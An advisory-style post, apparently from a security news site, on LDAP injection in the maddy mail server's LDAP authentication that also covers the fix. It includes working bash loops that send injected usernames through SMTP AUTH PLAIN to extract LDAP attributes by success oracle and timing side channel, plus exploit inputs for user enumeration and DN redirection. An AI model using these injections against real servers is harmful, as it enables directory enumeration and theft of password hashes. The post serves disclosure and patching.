Listen to this Post
How the vulnerability works (CVE-less, but real maddy 0.9.2 and before):
The `auth.ldap` module in maddy constructs LDAP search filters and DN strings by directly interpolating user-supplied usernames using `strings.ReplaceAll()` without any escaping. Three locations are affected: `Lookup()` (line 228), `AuthPlain()` for DN template (line 255), and `AuthPlain()` for filter (line 260). The `go-ldap/ldap/v3` library (v3.4.10) provides `ldap.EscapeFilter()` to escape (, ), “, \, and NUL per RFC 4515, but it is never called. An attacker reaching SMTP submission (AUTH PLAIN) or IMAP LOGIN can inject arbitrary LDAP filter expressions through the username field. For example, injecting `bob)(description=S` changes the filter from `(&(objectClass=inetOrgPerson)(uid={username}))` to (&(objectClass=inetOrgPerson)(uid=bob)(description=S)). Using authentication success (235) vs failure (535) as a boolean oracle, an attacker with valid credentials for any one account can extract arbitrary LDAP attributes character by character. Without credentials, a timing side‑channel (fast immediate failure vs slow LDAP bind failure) allows extraction for other users. The DN template injection (dn_template) also allows path traversal into different LDAP subtrees.
dailycve form:
Platform: maddy mail server
Version: 0.9.2 and below
Vulnerability: LDAP injection (auth)
Severity: Critical
date: 2025‑04‑13 (assumed disclosure)
Prediction: Patch already available (maddy 0.9.3)
What Undercode Say:
Verify vulnerable configuration
grep -A5 "auth.ldap" /etc/maddy/maddy.conf | grep "filter"
Extract attribute via boolean oracle (known password)
for char in {a..z}; do
INJECTED="bob)(description=${char}"
AUTH_BLOB=$(printf "\x00${INJECTED}\x00bob_pass" | base64)
echo -e "EHLO test\r\nAUTH PLAIN ${AUTH_BLOB}\r\nQUIT" | \
openssl s_client -connect 127.0.0.1:587 -starttls smtp -quiet 2>/dev/null | grep "235"
done
Timing side‑channel for unknown password
for c in {a..z}; do
INJECTED="alice)(description=${c}"
AUTH_BLOB=$(printf "\x00${INJECTED}\x00wrong" | base64)
time echo -e "EHLO test\r\nAUTH PLAIN ${AUTH_BLOB}\r\nQUIT" | \
nc localhost 587
done
Exploit:
Send AUTH PLAIN with username `alice)(uid=` to enumerate all users via “too many entries” error. Use `bob)(description=Secret` to test attribute values. For DN template, inject `,dc=attacker` to redirect authentication.
Protection from this CVE:
Upgrade to maddy 0.9.3. If patching impossible, apply `ldap.EscapeFilter()` on every `{username}` substitution in `internal/auth/ldap/ldap.go` (lines 228, 255, 260). Alternatively, disable `auth.ldap` or use regex validation (allow only alphanumeric + safe chars).
Impact:
Identity spoofing (authenticate as any user if password known), LDAP directory enumeration, blind extraction of password hashes, email addresses, group memberships, and DN path traversal leading to unauthorized LDAP entries.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

